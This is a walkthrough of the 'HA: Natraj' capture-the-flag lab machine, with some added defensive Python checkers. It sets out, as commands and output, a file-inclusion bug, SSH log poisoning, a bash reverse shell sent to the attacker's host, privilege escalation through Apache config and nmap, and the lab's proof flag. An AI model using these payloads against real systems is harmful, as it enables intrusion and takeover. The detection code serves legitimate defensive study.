[offensive-security] 2. HA: Natraj target VM
1. Gathering information on the target
1. Known information:
- IP: 192.168.214.80
2. Information gathered:
- nmap scan for open services
┌──(lo0p㉿0xlo0p)-[~]
└─$ ping 192.168.214.80
PING 192.168.214.80 (192.168.214.80) 56(84) bytes of data.
64 bytes from 192.168.214.80: icmp_seq=1 ttl=63 time=200 ms
64 bytes from 192.168.214.80: icmp_seq=2 ttl=63 time=206 ms
^C
--- 192.168.214.80 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 199.915/202.932/205.950/3.017 ms
- dirsearch brute-force of the web directories
┌──(lo0p㉿0xlo0p)-[~]
└─$ dirsearch -u 192.168.214.80
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/lo0p/.dirsearch/reports/192.168.214.80_22-10-25_09-09-23.txt
Error Log: /home/lo0p/.dirsearch/logs/errors-22-10-25_09-09-23.log
Target: http://192.168.214.80/
[09:09:23] Starting:
[09:10:06] 200 - 942B - /console/
[09:10:06] 301 - 318B - /console -> http://192.168.214.80/console/
[09:10:15] 200 - 5KB - /images/
[09:10:15] 301 - 317B - /images -> http://192.168.214.80/images/
[09:10:16] 200 - 14KB - /index.html
Task Completed
Entering the console directory reveals file.php; the guess is that it has an arbitrary file read vulnerability.
- ffuf brute-force of the parameter name
┌──(lo0p㉿0xlo0p)-[~]
└─$ ffuf -u 'http://192.168.214.80/console/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.214.80/console/file.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 0
________________________________________________
file [Status: 200, Size: 1398, Words: 9, Lines: 28]
The parameter name turns out to be file. Reading /etc/passwd and similar files directly yields three accounts that can log in over SSH: root, natraj and mahakal.
- Use the login log (/var/log/auth.log) to load a one-line webshell
┌──(lo0p㉿0xlo0p)-[~]
└─$ ssh ""@192.168.214.80
@192.168.214.80's password:
Permission denied, please try again.
Write the username (the one-line webshell) into the log, then use the file-read vulnerability above to have PHP parse that one-liner and send a reverse shell directly.
payload: 192.168.214.80/console/file.php?file=/var/log/auth.log&cmd=bash -c 'exec bash -i %26>%2Fdev%2Ftcp%2F192.168.49.214%2F8888 <%261'
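A defender-side check for the log-poisoning step above, added here as an example and not part of the original write-up: it scans sshd entries in auth.log for username fields that contain PHP code rather than an account name. The sample log lines are constructed.

```python
import re

# Constructed sample auth.log lines (not from the original write-up). The
# second and fourth lines show what a PHP one-liner supplied as the SSH
# username looks like once sshd has logged it.
SAMPLE_AUTH_LOG = """\
Oct 24 19:14:02 ubuntu sshd[1301]: Invalid user admin from 192.168.49.214 port 50210
Oct 24 19:14:10 ubuntu sshd[1305]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.49.214 port 50212
Oct 24 19:14:20 ubuntu sshd[1307]: Failed password for natraj from 192.168.49.214 port 50214 ssh2
Oct 24 19:14:31 ubuntu sshd[1309]: Invalid user <?=`$_GET[0]`?> from 192.168.49.214 port 50216
"""

# Markers that a "username" is really PHP code rather than an account name.
PHP_MARKERS = re.compile(
    r"<\?php|<\?=|\$_(GET|POST|REQUEST)\b|\b(system|exec|passthru|shell_exec)\s*\(", re.I)
# sshd lines that embed the client-supplied username.
USERNAME_FIELD = re.compile(
    r"(?:Invalid user|Failed password for(?: invalid user)?) (.+?) from (\S+) port")

def find_poisoned_entries(log_text):
    """Return (line_no, username, source_ip) for every sshd entry whose
    username field looks like injected PHP code."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = USERNAME_FIELD.search(line)
        if not m:
            continue
        user, src = m.group(1), m.group(2)
        if PHP_MARKERS.search(user):
            hits.append((n, user, src))
    return hits
```

On a live host, feed it the contents of /var/log/auth.log; any hit means the log is already a code-carrying file and should not be reachable from any include path.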
- Look for exploitable points
find / -user root -perm -4000 -print 2>/dev/null   # find SUID files owned by root
find / -perm -4000 2>/dev/null | xargs ls -la   # find SUID files and list them in detail
find / -writable -type d 2>/dev/null   # find directories writable by the current user
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/proc/1291/task/1291/fd
/proc/1291/fd
/proc/1291/map_files
/tmp
/var/www
/var/www/html
/var/www/html/console
/var/www/html/images
/var/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null   # find mode-777 files
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
find / -writable -type f 2>/dev/null | grep -v "/proc/" | xargs ls -al | grep root   # find writable files owned by root
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
--w--w--w- 1 root root 0 Oct 24 19:14 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.replace
/etc/apache2/apache2.conf turns out to be readable and writable; inspect the file
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
Change the user Apache starts as to one of the accounts obtained from /etc/passwd above (except root, since Apache refuses to start as root) to obtain the privileges of natraj or mahakal.
Run sudo -l to check the privileges of the www-data user
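An added audit example (not from the original write-up) for the finding above: it flags an Apache config that is writable by others and a User/Group directive pointing at root or at an interactive login account. The sample mode, config and passwd contents are constructed.

```python
import os
import re
import stat

# Constructed sample inputs (not from the original page): the st_mode of a
# world-writable apache2.conf, its User/Group block with the User directive
# redirected to a login account, and a minimal /etc/passwd.
SAMPLE_MODE = 0o100777
SAMPLE_CONF = """\
# These need to be set in /etc/apache2/envvars
User natraj
Group ${APACHE_RUN_GROUP}
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
natraj:x:1000:1000::/home/natraj:/bin/bash
mahakal:x:1001:1001::/home/mahakal:/bin/bash
"""

DIRECTIVE = re.compile(r"^\s*(User|Group)\s+(\S+)", re.M)

def shell_accounts(passwd_text):
    """Accounts from /etc/passwd whose login shell is not nologin/false."""
    accts = set()
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and not f[6].endswith(("nologin", "false")):
            accts.add(f[0])
    return accts

def audit_apache_conf(mode, conf_text, passwd_text):
    """Return the findings for one config: writable by others, or a User/Group
    directive that runs httpd as root or as an interactive login account."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("config is world-writable")
    elif mode & stat.S_IWGRP:
        findings.append("config is group-writable")
    logins = shell_accounts(passwd_text)
    for directive, value in DIRECTIVE.findall(conf_text):
        if value == "root":
            findings.append(f"{directive} directive set to root")
        elif directive == "User" and value in logins:
            findings.append(f"User directive runs httpd as login account {value}")
    return findings

def audit_path(conf_path="/etc/apache2/apache2.conf", passwd_path="/etc/passwd"):
    """Run the audit against real files on the host (needs read access)."""
    with open(conf_path) as c, open(passwd_path) as p:
        return audit_apache_conf(os.stat(conf_path).st_mode, c.read(), p.read())
```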
www-data@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/systemctl start apache2
(ALL) NOPASSWD: /bin/systemctl stop apache2
(ALL) NOPASSWD: /bin/systemctl restart apache2
apache2 can be restarted; after the restart, trigger the reverse shell again to obtain a shell as natraj or mahakal.
┌──(lo0p㉿0xlo0p)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.49.214] from (UNKNOWN) [192.168.214.80] 36300
bash: cannot set terminal process group (1476): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
natraj@ubuntu:/var/www/html/console$
Keep looking for exploitable points; natraj seems to have none, so switch to mahakal
┌──(lo0p㉿0xlo0p)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.49.214] from (UNKNOWN) [192.168.214.80] 59936
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
mahakal@ubuntu:/var/www/html/console$ sudo -l
sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
mahakal can use nmap to escalate to root
Exploitation on old nmap versions:
sudo nmap --interactive   # run nmap's interactive mode
!bash or !sh   # spawn bash or sh from the nmap> prompt
On newer nmap versions:
echo 'os.execute("/bin/sh")' > /tmp/nse_root.nse
# .nse is the file extension for nmap's scripting-engine plugins
nmap --script=/tmp/nse_root.nse
See also: nmap | GTFOBins
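An added example covering both sudo -l results on this box (www-data's systemctl rules and mahakal's nmap rule), not part of the original write-up: it parses sudo -l output and flags rules that hand out shell-capable binaries, and service restarts whose config the caller can already write. The sample output is constructed, and the shell-capable list is a short illustrative subset.

```python
import re

# Constructed sudo -l output (not copied from the page) in the same layout
# the write-up shows for www-data and mahakal.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mahakal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap
    (ALL) NOPASSWD: /bin/systemctl restart apache2
    (root) /usr/bin/apt update
"""

# Illustrative subset of binaries that execute arbitrary code when run with
# elevated privileges (nmap's --script/--interactive paths are one instance).
SHELL_CAPABLE = {"nmap", "vim", "vi", "less", "more", "find", "awk",
                 "python", "python3", "perl", "bash", "sh"}
# A restart rule only matters when the service config is writable by the caller.
RESTART_RE = re.compile(r"systemctl\s+(restart|start)\s+(\S+)")
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_l(text):
    """Return (runas, tags, command) for each rule under the 'may run' header."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = ENTRY.match(line)
        if m:
            tags = {t.strip(": ") for t in m.group("tags").split()}
            entries.append((m.group("runas"), tags, m.group("cmd").strip()))
    return entries

def risky_entries(text, writable_service_configs=()):
    """Return (command, reason) for sudo rules a reviewer should flag."""
    out = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            out.append((cmd, f"{binary} can spawn a shell as {runas}"))
        m = RESTART_RE.search(cmd)
        if m and m.group(2) in writable_service_configs:
            out.append((cmd, f"restarts {m.group(2)} whose config is writable by the caller"))
    return out
```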
mahakal@ubuntu:/tmp$ TF=$(mktemp)
TF=$(mktemp)
mahakal@ubuntu:/tmp$ echo $TF
mahakal@ubuntu:/tmp$ echo 'os.execute("/bin/bash")' > $TF
mahakal@ubuntu:/tmp$ sudo nmap --script=$TF
Starting Nmap 7.60 ( https://nmap.org ) at 2022-10-24 20:06 PDT
NSE: Warning: Loading '/tmp/tmp.FAkO8IMrkw' -- the recommended file extension is '.nse'.
whoami
root
cd /root
ls
proof.txt
root.txt
cat root.txt
Your flag is in another file...
cat proof.txt
c64360b926ca96882f943b1f10cce059